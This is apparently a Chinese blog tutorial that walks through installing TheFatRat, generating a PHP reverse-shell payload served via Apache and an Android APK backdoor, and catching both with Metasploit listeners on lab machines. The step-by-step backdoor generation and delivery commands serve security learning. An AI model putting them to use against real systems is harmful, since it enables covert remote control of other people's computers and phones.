大杀器TheFatRat

项目地址：https://github.com/Screetsec/TheFatRat

安装TheFatRat

root@sch01ar:/sch01ar# git clone https://github.com/Screetsec/TheFatRat
root@sch01ar:/sch01ar# cd TheFatRat/ && ls
root@sch01ar:/sch01ar/TheFatRat# chmod +x setup.sh
root@sch01ar:/sch01ar/TheFatRat# ./setup.sh

 安装完成后直接在终端输入fatrat启动

root@sch01ar:~# fatrat

 

回车

 

回车

回车

这是菜单界面

这里测试两个功能，首先测试反弹电脑的

选择1，回车

这里有多个文件类型可以选择，我就测试php的，选择5，回车

 

填写好配置信息

在output目录下生成了文件

将sch01ar.php移动到/var/www/html/目录下

root@sch01ar:~# mv /sch01ar/TheFatRat/output/sch01ar.php /var/www/html/

开启apache2服务

root@sch01ar:~# service apache2 start

开启msf，设置好配置

然后exploit –j

用试验机win08去访问http://192.168.220.131/sch01ar.php

然后测试安卓的

在主菜单选择1，然后选择3

然后配置，填写好ip和端口

设置payload，选择3

选择完后显示配置的信息

回车

选择y，将会生成一个后缀为rc的文件，方便以后msf连接

然后命名rc文件

回车

root@sch01ar:~# cd /sch01ar/TheFatRat/config/listeners/ && ls

root@sch01ar:/sch01ar/TheFatRat/config/listeners# msfconsole -r sch01ar.rc

启动msf，等待着反弹就好了

打开apk在的文件夹

把apk文件放到模拟器上安装

点击

Msf反弹成功